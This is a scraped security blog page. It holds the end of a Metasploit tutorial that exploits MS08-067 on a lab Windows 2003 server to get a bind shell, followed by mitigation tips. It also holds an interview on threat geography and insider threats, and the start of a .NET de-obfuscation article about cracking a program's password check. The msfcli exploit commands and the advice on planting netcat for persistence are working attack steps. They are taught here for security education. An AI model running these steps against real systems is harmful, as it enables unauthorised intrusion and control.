<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># ./msfcli exploit/windows/smb/ms08_067_netapi RHOST= 192.168.40.132</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now, we have to configure the payloads, hence placing ‘P’ after IP address would show the associated payloads lists as:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW15.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW15.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This time, we are choosing the bind_tcp payload to get the remote shell where the local computer IP address does not have to be configured. Put the payload name and show its option using ‘O’ again as:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_617531" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 749px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 719px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># ./msfcli exploit/windows/smb/ms08_067_netapi RHOST= 192.168.40.132 PAYLOAD=windows/shell/bind_tcp</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW16.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW16.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Here, we don’t need to set any options, just execute the exploit finally by placing ‘E’ after the payload name as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_79192" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 763px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 733px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># ./msfcli exploit/windows/smb/ms08_067_netapi RHOST= 192.168.40.132 PAYLOAD=windows/shell/bind_tcp E</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
If the target is vulnerable to SMB services, then this exploit is executed successfully via Metasploit:<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW17.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW17.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
And, we will successfully obtain full access to the target Windows 2003 server computer command shell. Such exploitation of these unpatched vulnerabilities leads Windows 2003 into severe danger, because the database server (SQL), mail server (SMTP), File Server, FTP Server and web server (IIS) are typically operated from here. Hackers can now able to perform any administrative operations and destruct in any manner such as deleting files and directories and planting unsolicited malware in the form of <em>netcat</em> to maintain future access as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW18.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW18.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Mitigation</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
So, we have seen how easy it is for a hacker to exploit an unpatched vulnerability of Windows 2003 OS through Metasploit. Security personnel could protect the server from such attacks by ensure the following configurations at server side:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Disable all redundant services</li>
<li>Always enable Firewalls</li>
<li>Configure IDS/IPS at server side</li>
<li>Configure DMZ for critical resource (IIS, FTP Server, Database)</li>
<li>Powerful anti-virus with latest threat signature database</li>
<li>Patch operating system with latest updates</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Synopsis</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This article demystified the remote shell accessing by exploiting of unpatched Windows 2003 server vulnerabilities and taking complete control over target remote computers, which is in fact a complex and difficult undertaking. We have come to an understanding of operating the Metasploit amazing modules <em>Msfconsole </em>and<em> Msfcli</em>, which simplifies things by providing a consistent interface for exploits and concedes you to use your optimal payload with your elected exploit. We have confronted with various commands of msfconsole and learned a bunch of exploitation processes through msfcli too.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://resources.infosecinstitute.com/exploiting-windows-2003-server-reverse-shell/" target="_blank">http://resources.infosecinstitute.com/exploiting-windows-2003-server-reverse-shell/</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-59722741533629583392014-05-08T17:17:00.001-07:002014-05-08T17:17:22.386-07:00[infosecurity-magazine] World’s Most Advanced Hackers are in Russia and Eastern Europe<h2 class="article-intro" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 1.3em; font-weight: 400; line-height: 1.4em; margin: 0px 0px 14px;">
At Infosecurity Europe 2014, Eleanor Dallaway caught up with Ross Brewer, vice president and managing director for international markets, and Mike Reagan, CMO at LogRhythm to talk insider threats, and the global threat landscape…<a name='more'></a></h2>
<div class="article-content" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 12px;">
<div style="line-height: 1.4em; margin-bottom: 12px;">
As MD for international markets, <a href="https://www.logrhythm.com/" style="color: #e5141a; outline: none;" target="_blank">LogRhythm</a>’s Ross Brewer is well versed in the latest geographical trends and targets. “Germany is a big target at the moment”, he told <em>Infosecurity</em>. “It is a manufacturing country with amazing IP. It’s a country conscious of monitoring its population too much with a focus on employee privacy, and this is not lost on the hacking community.” German IP is therefore a target and tends to end up in Asia, according to Brewer.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
As an emerging market, the <a href="http://www.infosecurity-magazine.com/view/32611/arab-uprising-information-security-in-the-middle-east" style="color: #e5141a; outline: none;" target="_blank">Middle East</a> positioning itself as ‘the destination’ is also a target, Brewer said. “The biggest threat to Europe comes from Eastern countries where the most experienced, most capable hackers are. The most advanced hackers on the planet reside in Russia and Eastern Europe.” Threats from Asia tend to be less stealthy, however, Brewer declared. “So whilst the most obvious threat comes from Asia, the most real threat comes from East Europe.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
LogRhythm’s Brewer also flagged the French market as vulnerable, notably “because they buy all their technology from within France, but forget they’re plugged into a global internet which leaves them exposed.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Brewer also addressed Africa. “As technologies become more pervasive and wireless more common in Africa, there will be increased threat activity. At the moment, the African infrastructure is not on the same level as the rest of the world, with power and technology intermittent, but as that increases, so too will the threat”.<br />“Critical infrastructure is the target now, in every country”, Brewer told<em>Infosecurity</em>.</div>
<h4 style="font-size: 1em; line-height: 1.4em; margin: 0px;">
The Pervasive Insider Threat Problem</h4>
<div style="line-height: 1.4em; margin-bottom: 12px;">
A <a href="http://www.logrhythm.com/company/press-releases/uk-businesses-all-talk-on-insider-threats.aspx" style="color: #e5141a; outline: none;" target="_blank">recent survey</a> of 1000 IT professionals, conducted by OnePoll on behalf of LogRhythm, found 36% of IT professionals believe employees would access or steal confidential information, yet 38% do not have, or know of, any systems in place to stop employees accessing unauthorised data.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
In a corresponding survey of 200 employees, 47% admitted to having accessed or taken confidential information from the workplace. “In more than three quarters of these cases, they were not caught”, Reagan told <em>Infosecurity.</em> “And of the minority that were caught, there was no consequence or disciplinary action.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
What’s surprising about the results, said Reagan, “is the size of the visibility gap. There has been enough high-profile breach action for everyone to know that there is a big problem, there’s a growing abundance of information that shows what the problem is, so it’s baffling that the majority of organizations aren’t putting adequate systems in place.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The problem, agreed Brewer and Reagan, is the high-privileged access to data that organizations are giving people. “It’s not if you’ll be breached, but when. Those that aren’t taking action will be forced to by share-holders eventually.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The report results cite the insider threat as a bigger security risk (31%) than external threats (29%), yet the general consensus suggests that not enough importance is being placed on containing it, with 37% feeling like their business could do more to safeguard information from employees. “It will take legislation to drive this home. It could even take lives being cost before action is taken”, said Brewer.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Comparing the potential damage from the malicious insider threat versus the accidental, Brewer is clear that the deliberate threat is likely to be more catastrophic. “The accidental exposure of information is not used or deliberately targeted, so the consequences are less severe. Targeted crime is more concerning and causes more damage.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
<a href="http://www.infosecurity-magazine.com/view/38329/worlds-most-advanced-hackers-are-in-russia-and-eastern-europe-/" target="_blank">http://www.infosecurity-magazine.com/view/38329/worlds-most-advanced-hackers-are-in-russia-and-eastern-europe-/</a></div>
</div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-76929403687035538082014-05-05T18:28:00.000-07:002014-05-05T18:28:02.014-07:00[infosecinstitute] Encrypted Code Reverse Engineering: Bypassing Obfuscation<div class="post-content" style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div style="margin-bottom: 20px;">
<strong>Abstract</strong></div>
<div style="margin-bottom: 20px;">
Obfuscation is a distinctive mechanism equivalent to hiding, often applied by security developers, to harden or protect the source code (which is deemed as intellectual property of the vendor) from reversing. The goal of such an approach is to transform the source code into new encrypted byzantine source code symbols which have the same computational effect as the original program. By applying effective obfuscation over the source code, it is difficult for a vicious-intentioned person to analyze or subvert the unique functionality of software as per his requirements. Vendors typically seem to be safe by ensuring obfuscation over their intellectual property, but unfortunately<em>, software code is not safe from being modified even after applying obfuscation; it still can be cracked</em>. However, this phenomenon can be illustrated by applying sort of rare tactics to bypass the obfuscation mechanism in order to reverse engineer or alter the inherent functionality of software.</div>
<a name='more'></a><br />
<div style="margin-bottom: 20px;">
<strong>Essentials</strong></div>
<div style="margin-bottom: 20px;">
Software de-obfuscation is considered to be one of the complex undertakings in reverse engineering and is achieved by going through numerous phases. First, the researcher is required to have a thorough understanding of coding under .NET CLR because we shall reverse engineer a .NET built software which has source code that is already protected. Moreover, the researcher must know how to obfuscate a source code, as well as have a comprehensive knowledge of IL assembly language to alter the .NET software binary instructions sets as per their needs. The following list outlines the software that must be installed on his machine:</div>
<ul>
<li>Visual Studio 2010 or later</li>
<li>Reflector or ILSPY</li>
<li>Reflexil (Add-on)</li>
<li>CodeSearch (Add-on)</li>
<li>IL Assembly Language</li>
</ul>
<div style="margin-bottom: 20px;">
<strong>Obfuscation Analysis</strong></div>
<div style="margin-bottom: 20px;">
It is a very difficult and often time-consuming process to reverse engineer a compiler-generated code, especially as things gets even worse when machine code is in encrypted or obfuscated form. Such compiler-generated code is deliberately constructed in encrypted form to resist analysis from reverse engineers. Some examples of situations in which obfuscation might be applied are as follows:</div>
<ul>
<li><strong>Protection of intellectual property</strong>—Commercial software typically has protection against unauthorized duplication by employing further obfuscation for the purpose of obscuring the implementation particulars of certain crucial segments of the mechanism.</li>
<li><strong>Digital Rights Management</strong>— leading contemporary applications are often obfuscated by employing DRM schemes, which commonly protect certain crucial pieces of information (e.g., protocols and cryptographic keys) using obfuscation.</li>
<li><strong>Malware</strong>— Hackers and reverse engineer criminals practice obfuscation for avoiding the detection of malware signature from anti-virus search engines.</li>
</ul>
<div style="margin-bottom: 20px;">
Let’s consider the following sample software, which is typically first asking for a password to enter into the system. This software is responsible for manipulating a sort of classified information of secret agents, and only highly privileged personnel can access such confidential details on behalf of secret keys.</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo2.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo2.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.1</em></div>
<div style="margin-bottom: 20px;">
Fortunately, we somehow obtain this software from a disgruntled employee, but the problem is that we don’t have the list of access keys to log-in into the system. Hence, the only option is left to reverse engineer this software for the purpose of revealing password information or identifying another crucial piece of blocks so that we can subvert the authentication mechanism altogether. So, first make sure with the platform origin of the software on which it is actually built, actually determine the type of executable we are dealing with. CFF explorer might assist to extract such details as follows:</div>
<div style="margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo3.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo3.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.2</em></div>
<div style="margin-bottom: 20px;">
Great!! This software is built and compiled under .NET CLR framework. It is rather easy to decompile .NET assembly by using a couple disassemblers such as ILSPY, Reflector and ILDASM, because such tools are competent enough to decompile the .NET binary into actual source code. As we stated in earlier <a href="http://resources.infosecinstitute.com/articles/" style="color: rgb(51, 51, 51) !important; text-decoration: none;" title="articles">articles</a>, ILDASM can decompile IL assembly code of an executable, moreover it is possible to recompile that modified IL code with different name using ILASM.exe; however we tried ILDASM here, but it could not save us because IL code is also fool-proof protected, and ILDASM can’t decompile it as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo4.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050414_1505_EncryptedCo4.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="margin-bottom: 20px; text-align: center;">
<em>Figure 1.3</em></div>
<div style="margin-bottom: 20px;">
Anyway, Reflector or ILSPY would be truly a rescuer in this situation, because unlike ILDASM, they can decompile the source code in original format along with IL assembly code. But here, we shall have some to confront with some other considerable issue, as the software intellectual property is protected. Reflector would decompile the accompanied classes, methods and property of this assembly, but in encrypted form as follows:</div>
<div style="margin-bottom: 20px; text-align: center;">
